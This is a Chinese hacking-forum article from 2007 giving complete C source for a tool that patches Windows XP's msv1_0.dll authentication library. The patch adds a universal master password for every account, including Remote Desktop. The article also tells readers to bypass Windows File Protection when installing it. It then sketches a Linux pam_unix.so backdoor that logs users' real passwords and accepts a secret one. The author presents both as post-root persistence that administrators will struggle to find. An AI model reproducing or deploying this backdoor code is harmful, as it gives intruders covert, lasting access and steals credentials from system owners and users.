| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> Hack >> 脚本漏洞攻击 >> 正文 用户登录 新用户注册
通用的密码后门         ★★★ 【字体:
通用的密码后门
作者:clyfish 文章来源:幻影邮件列表 点击数: 更新时间:2007-11-26
以下程序只在winxpsp2中文版上测试

以下是代码片段:
#include <stdio.h>
#include <stdlib.h>
#include "windows.h"
#include "wincrypt.h"

wchar_t passwd[1024];
char path[1024], hash[16];
const int os1 = 0x8DB0, os2 = 0x1C3A7, ospasswd = 0x1C397;
const char chunk1[] = {
0xE8, 0xF2, 0x35, 0x01, 0x00, 0x90
};
const char chunk2[] = {
0x55, 0x8B, 0xEC, 0x6A, 0x10, 0xFF, 0x75, 0x0C,
0x68, 0x97, 0xCF, 0xC5, 0x77, 0xFF, 0x15, 0xCC,
0x10, 0xC4, 0x77, 0xC9, 0x83, 0xF8, 0x10, 0x75,
0x03, 0xC2, 0x00, 0x00, 0xFF, 0x25, 0xCC, 0x10,
0xC4, 0x77
};

void err(char *msg) {
printf("error: %s\n", msg);
exit(1);
}

int main(int argc, char *argv[]) {
HCRYPTPROV hProv;
HCRYPTHASH hHash;
unsigned len, sint = sizeof(int);
FILE *fout;

if (argc != 2) {
printf("msv1_0.dll password backdoor generator by cly\n"
"Usage:\n%s password\nOnly for winxp sp2\n", argv[0]);
exit(1);
}

len = strlen(argv[1]);
if (len > 512)
err("the password is too long");
len = MultiByteToWideChar(CP_ACP, 0, argv[1], len, passwd, 1024);

if(!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, 0))
if (!CryptAcquireContext(&hProv, NULL, MS_DEF_PROV,
PROV_RSA_FULL,
CRYPT_NEWKEYSET))
err("CryptAcquireContext");
if (!CryptCreateHash(hProv, CALG_MD4, 0, 0, &hHash))
err("CryptCreateHash");
if (!CryptHashData(hHash, passwd, len * sizeof(wchar_t), 0))
err("CryptHashData");
CryptGetHashParam(hHash, HP_HASHSIZE, &len, &sint, 0);
if (len != 16)
err("CryptGetHashParam");
CryptGetHashParam(hHash, HP_HASHVAL, hash, &len, 0);
if (hHash)
CryptDestroyHash(hHash);
if (hProv)
CryptReleaseContext(hProv, 0);

if (strlen(getenv("windir")) > 512)
err("Are you kidding?");
sprintf(path, "%s\\system32\\msv1_0.dll", getenv("windir"));
if (!CopyFileA(path, "msv1_0.dll.cly", 0))
err("CopyFileA");
fout = fopen("msv1_0.dll.cly", "rb+");
if (fout == NULL)
err("fopen");
fseek(fout, os1, SEEK_SET);
fwrite(chunk1, sizeof(chunk1), 1, fout);
fseek(fout, os2, SEEK_SET);
fwrite(chunk2, sizeof(chunk2), 1, fout);
fseek(fout, ospasswd, SEEK_SET);
fwrite(hash, sizeof(hash), 1, fout);
fclose(fout);

return 0;
}

    运行这个程序把得到的msv1_0.dll.cly复制到c:\windows\system32\msv1_0.dll(自己想办法绕过WFP),所
有的用户就可以用你设置的密码来登陆了,远程桌面也是可以的。

    这里只是提供一种思路,其他的版本比如win2k3应该而是可以这样搞的。
   其实我最开始是看到网上一片文章,不过他是空口令可以登陆,而我这是自己设置的口令可以登陆。

     Linux下就更简单了,直接编译一个自己的pam_unix.so上去就可以了。
     这个pam_unix.so可以记录正确的密码,也可以做和上面一样的通用密码后门。
我是这样搞的,先判断密码对错,如果对了则记录并放行,否则判断是否为我设置的通用密码,如果是就放行,其他的验证失败。

    这样我local root成功后,放这样一个后门,管理员还真是难查出来。

    写出来只为博高手一笑。

责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇黑客:

  • 下一篇黑客:
  • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    * 游客填写  ·注册用户
    主 页:
    评 分:
    1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
  • 最新hack更新
    最新推荐资讯
    相关黑客
    注册表及组策略后门实测手札
    linux留本地后门两个方法
    三分钟搞定隐藏管理员
    后门程序技术知识深解
    RAR文件密码破解器
    RAR文件密码破解器
    轻松击破ATA硬盘密码
    密码安全白皮书
    Vbs脚本实现radmin后门
    亮点频频的黑洞2007
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号